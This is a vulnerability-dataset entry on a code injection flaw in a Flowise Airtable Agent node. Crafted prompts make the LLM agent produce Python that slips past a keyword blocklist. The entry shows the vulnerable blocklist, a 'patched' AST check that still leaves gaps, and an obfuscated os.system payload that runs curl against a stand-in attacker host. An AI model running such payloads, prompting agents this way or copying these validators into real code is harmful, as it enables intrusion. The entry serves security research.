VAITP Dataset

← Back to the dataset

CVE-2026-73485

Flowise Airtable Agent allows RCE via blocklist bypass in prompt.

  • CVSS 9.0
  • 94
  • Input Validation and Sanitization
  • Remote

Flowise before 3.1.3 contains a code injection vulnerability in the Airtable Agent node that allows unauthenticated attackers to execute arbitrary Python code by bypassing the pythonCodeValidator blocklist through obfuscation techniques. Attackers can send crafted prompts to a chatflow using the Airtable Agent node to inject malicious Python code that executes in an unsandboxed pyodide environment with full access to the host operating system.

CWE
94
CVSS base score
9.0
Published
2026-08-13
OWASP
A03 Injection
Orthogonal defect classification
Checking
Code defect classification
Incorrect Check
Category
Input Validation and Sanitization
Subcategory
Command Injection
Accessibility scope
Remote
Impact
Arbitrary Code Execution
Affected component
Flowise
Fixed by upgrading
Yes

Solution

Upgrade Flowise to version 3.1.3 or later.

Vulnerable code sample

import re
import ast

# Insecure blocklist of keywords to prevent malicious code execution.
BLOCKLIST = [
    'import', 'os', 'sys', 'subprocess', 'eval', 'exec',
    'open', '__',
]

def pythonCodeValidator(code: str) -> bool:
    """
    Validates the given Python code against a blocklist.
    This method is insecure as it can be bypassed with obfuscation.
    """
    # VULNERABLE: A simple string-based blocklist is easily bypassed by obfuscation.
    for keyword in BLOCKLIST:
        if keyword in code.lower():
            return False
    return True

class AirtableAgentNode:
    """
    Represents a node that can execute Python code generated by an LLM
    in response to a prompt, supposedly in a sandboxed environment.
    """
    def execute_code_tool(self, generated_code: str):
        """
        Executes the provided code string if it passes validation.
        """
        if not pythonCodeValidator(generated_code):
            raise ValueError("Disallowed Python code was detected.")

        # The code is executed in an environment like pyodide.
        # We use exec() here to represent the code execution sink.
        exec(generated_code, {"__builtins__": {}})

Patched code sample

import re
import ast

# The insecure blocklist is removed. Validation is now done via AST parsing.

def pythonCodeValidator(code: str) -> bool:
    """
    Validates the given Python code by parsing it into an
    Abstract Syntax Tree (AST) and checking for disallowed nodes.
    """
    # FIX: The code is parsed into an AST and walked to disallow dangerous nodes.
    try:
        tree = ast.parse(code)
        for node in ast.walk(tree):
            if isinstance(node, (ast.Import, ast.ImportFrom)):
                return False
            # Check for dangerous attribute access like `__builtins__.__import__`
            if isinstance(node, ast.Attribute) and node.attr in ('__import__', 'exec', 'eval'):
                return False
    except SyntaxError:
        return False  # Invalid Python code is not allowed
    return True

class AirtableAgentNode:
    """
    Represents a node that can execute Python code generated by an LLM
    in response to a prompt, supposedly in a sandboxed environment.
    """
    def execute_code_tool(self, generated_code: str):
        """
        Executes the provided code string if it passes validation.
        """
        if not pythonCodeValidator(generated_code):
            raise ValueError("Disallowed Python code was detected.")

        # The code is executed in an environment like pyodide.
        # We use exec() here to represent the code execution sink.
        exec(generated_code, {"__builtins__": {}})

Payload

getattr(__import__(('o' + 's')), ('sys' + 'tem'))('curl https://attacker.example.com/pwned')

Cite this entry

@misc{vaitp:cve202673485,
  title        = {{Flowise Airtable Agent allows RCE via blocklist bypass in prompt.}},
  author       = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
  year         = {2026},
  note         = {VAITP Python Vulnerability Dataset, entry CVE-2026-73485},
  howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2026-73485/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.

The supreme art of war is to subdue the enemy without fighting.

Sun Tzu – “The Art of War”

:: Shaping the future through research and ingenuity ::